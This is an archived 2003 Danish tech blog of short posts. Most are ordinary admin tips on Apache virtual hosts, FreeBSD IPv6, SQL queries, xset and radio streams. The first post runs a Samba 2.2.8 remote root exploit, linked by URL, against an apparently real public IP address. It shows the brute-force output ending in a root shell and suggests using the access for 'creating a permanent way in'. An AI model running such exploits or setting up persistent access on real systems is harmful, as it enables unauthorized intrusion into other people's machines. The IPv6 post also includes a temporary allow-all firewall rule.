Linux penetration #1: Samba

Udgivet den maj 29, 2003 af mike

http://base.fujang.dk/files/mike/sambal.c
Taken from :http://www.greyhat.org/exploits/2003/april/sambal.c

peanut# ./sambal -b 0 -v 80.196.128.94
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
————————————————————–
+ Verbose mode.
+ Bruteforce mode. (Linux)
+ Host is running samba.
+ Using ret: [0xbffffed4]
+ Using ret: [0xbffffda8]
+ Recieved a non session message
+ Using ret: [0xbffffc7c]
+ Using ret: [0xbffffb50]
+ Recieved a non session message
+ Recieved a non session message
+ Worked!
————————————————————–
*** JE MOET JE MUIL HOUWE
Linux ricecrispy 2.4.20 #2 Mon Mar 17 22:02:15 PST 2003 i686 unknown
uid=0(root) gid=0(root) groups=99(nogroup),98(nobody)

Now you have a ghost shell, you can type commands and send keystrokes til the command but it wont act like a regulare terminal, but enough for creating a permanent way in.

Udgivet i Exploits, Knowledge Base, Old Base | Skriv en kommentar

Upgrade orinoco silver -> gold

Udgivet den maj 23, 2003 af mike

By padde

<padde> mike_: faktisk kan du smide en ny firmware på dit kort, så det bliver til gold.
<padde> mike_: http://beastie.dk/tmp/128bit_flash_810.zip 😉
http://beastie.dk/tmp/128_driver_orinoco742.zip

Udgivet i Hardware hacking, Knowledge Base, Old Base | Skriv en kommentar

How to search in sql databases.

Udgivet den maj 16, 2003 af Valdimirr

To find a cell contain a specific word you can use the following line in sql.

“select * from tabel where felt like \”%$variable%\” order by felt”

// Vladimirr – Vladimirr.dk

Udgivet i Knowledge Base, Lamp, Old Base, SQL | Skriv en kommentar

How to disable xscreensaver black screen

Udgivet den maj 15, 2003 af Brian Lund Klint 
use: xset s off

If you want to learn more, please refer to "man xset"

// Vladimirr - Vladimirr.dk
Udgivet i Knowledge Base | Skriv en kommentar

How to disable xscreensaver black screen

Udgivet den maj 15, 2003 af Valdimirr

use: xset s off

If you want to learn more, please refer to “man xset”

// Vladimirr – Vladimirr.dk

Udgivet i Linux, Uncategorized | Skriv en kommentar

Netradioer

Udgivet den maj 7, 2003 af mike

boogie mplayer mms://drlive.dr.dk/e06ch1kb64
electric mplayer mms://drlive.dr.dk/e05ch2kb64
ghetto mplayer mms://drlive.dr.dk/e05ch1kb64
klasisk player mms://drlive.dr.dk/e06ch2kb64
p1 mplayer mms://drlive.dr.dk/e07ch1kb64
p3 mplayer mms://drlive.dr.dk/e07ch2kb64
di mplayer http://160.79.1.141:8780

Udgivet i Knowledge Base, Links, Old Base | Skriv en kommentar

Hacking apache2 header-version

Udgivet den maj 6, 2003 af mike

The version header is defined in ./include/ap_release.h in the apaceh2 source tree if you want to limit the number of information there is a option for that in the httpd.conf

More info later if required

Udgivet i Apache, Knowledge Base, Old Base | Skriv en kommentar

Virtualhosts in apache

Udgivet den april 27, 2003 af mike

To activate virtualhosts write, in the end of the httpd.conf :

NameVirtualHost *

And after that you can add virtualhosts with this syntax, just make sure the dns names points to your servers ip:

<VirtualHost *>
    Documentroot /home/subdomain
    ServerName subdomain.cyberfamily.dk
    Serveralias www.subdomain.cyberfamily.dk
    ScriptAlias /cgi-bin/ "/home/subdomain/cgi-bin"
</VirtualHost>

 

Documentroot , tells apache where the .html files will be
ServerName , tells what name apache should call itself when a users requests a page from the virtualdomain
Serveralias , tells apache an alias for the vhost, for an instance www.
ScriptAlias , tells apache where to find cgi-scripts for vhost

Udgivet i Apache, Knowledge Base, Old Base | Skriv en kommentar

FreeBSD ipv6 client

Udgivet den april 27, 2003 af mike 
Asuming your router is working correctly with the ip 
3ffe:80ee:5f8::/1 with a /64 range.

 * Give the interface "wi0" the ip 3ffe:80ee:5f8::2 with cidr 
prefix 64
ifconfig wi0 inet6 3ffe:80ee:5f8::2 prefixlen 64

 * Add default ipv6 gateway
route add -inet6 default 3ffe:80ee:5f8::1


And your on.



To automate this with the initscripts put this in rc.conf
ipv6_enable="YES"
ipv6_ifconfig_wi0="3ffe:80ee:5f8::2 prefixlen 64"
ipv6_defaultrouter="3ffe:80ee:5f8::1"

if youre with pcmcia you should put them in /etc/start_if.wi0 
instead and hack your rc.netw

Add the bold line.

    384         # Set up any static routes.
    385         case ${ipv6_defaultrouter} in
    386         [Nn][Oo] | '')
    387                 ;;
    388         *)
    389         ipv6_static_routes="default ${ipv6_static_routes}"
  390         ipv6_route_default="default ${ipv6_defaultrouter}"
391 ;;
392 esac
Udgivet i FreeBSD, Knowledge Base, Networking, Old Base | Skriv en kommentar

IPv6 router under FreeBSD

Udgivet den april 27, 2003 af mike

First set up the IPv6 native for the router(mostly done by tunneling)

XS26.net’s scripts

#!/bin/sh
#MYIPv4=”80.196.157.241″ # My IPv4 address
#XSIPv4=”62.61.157.209″ # PoP’s IPv4 address
#MYIPv6=”3ffe:80ee:5f8::1″ # Choose any IPv6 address from the range
# you’ve got from XS26
##TUNLIF=”gif0″

ifconfig gif0 create tunnel 80.196.157.241 62.61.157.209 up
route add -inet6 default -interface gif0
ifconfig lo0 inet6 3ffe:80ee:5f8::1 prefixlen 128

Then we need to compile firewall support for IPv6 into the kernel, add these and rebuild kernel:

options IPV6FIREWALL
options IPV6FIREWALL_VERBOSE

By default everything is disallowed so to allow everything(IMPORTENT: Just because almost nobody uses IPv6 you cant drop the security here, so you have to get back later to set up a prober firewall) type:

ip6fw add accept all from any to any

Then our local ipv6 is running, to share it we first have to make our local machines able to talk to each other trough ipv6, to do this the local interface have to have an ipv6 ip:

ifconfig rl0 inet6 3ffe:80ee:5f8::1 prefixlen 64

Note that this is the same ip as the machine has on the global interface, but here with 64 bit prefix instead meaning that the network 3ffe:80ee:5f8:: can be reached trough this interface.

Then enable routing by typing:
sysctl net.inet6.ip6.forwarding=1

and now it should be running, this can be done automaticly by a dirty litle quick hack in you init scripts, or you can try to figure out how to do as much as posible of it from standard initscripts.

This works in a pure setup, if you mix it with other technologies you might encounter odd problems which requires newthinking.

Udgivet i FreeBSD, Knowledge Base, Networking, Old Base | Skriv en kommentar